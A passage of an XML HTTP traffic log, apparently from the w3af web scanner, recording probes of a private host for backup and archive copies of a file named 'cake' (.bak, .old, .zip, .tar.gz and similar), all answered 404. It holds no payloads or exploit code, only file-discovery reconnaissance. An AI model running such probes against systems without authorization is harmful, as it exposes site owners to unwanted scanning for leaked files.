                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="345">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="346">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="347">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="349">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="350">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="352">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="353">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="355">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="356">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="357">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="358">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="361">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/De1k3Ngp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about De1k3Ngp has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='De1k3Ngp'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="363">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="364">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="365">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="366">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="369">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="371">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="372">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="373">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="376">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
